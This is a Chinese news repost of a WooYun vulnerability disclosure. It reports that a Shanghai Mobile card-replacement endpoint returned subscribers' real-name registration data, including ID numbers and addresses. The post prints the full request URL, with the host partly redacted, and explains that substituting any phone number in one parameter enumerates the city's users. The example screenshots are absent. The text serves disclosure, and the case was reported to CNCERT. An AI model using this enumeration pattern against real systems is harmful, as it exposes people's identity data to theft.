上海移动所有用户实名制信息可任意查询

站长基地最新获悉 乌云漏洞平台披露，通过漏洞，上海移动所有用户实名制信息可任意查询（包括身份证号，居住地址等）。目前，已经转由CNCERT向中国移动集团公司通报，由其后续协调网站管理部门通报。

以下是漏洞泄露信息过程

上海移动，换卡不换号

http://.sh.10086./shop/app?service=page/base.OrderBackUpCard&listener=initPage

需要验证实名制身份证信息，抓包，发现如下POST请求

http://.sh.10086./shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post

用户登记的信息竟然直接返回。

利用URLhttp://.sh.10086./shop/app?service=ajaxDirect/1/base.OrderBackUpCard/base.OrderBackUpCard/javascript/undefined&pagename=base.OrderBackUpCard&eventname=checkBackUpCardLimit&partids=undefined&ajaxSubmitType=post&edit_MANAGENUMBER=手机号

可遍历全市用户实名制信息。

例1

例2

点到为止，不再遍历。

漏洞证明

例1

例2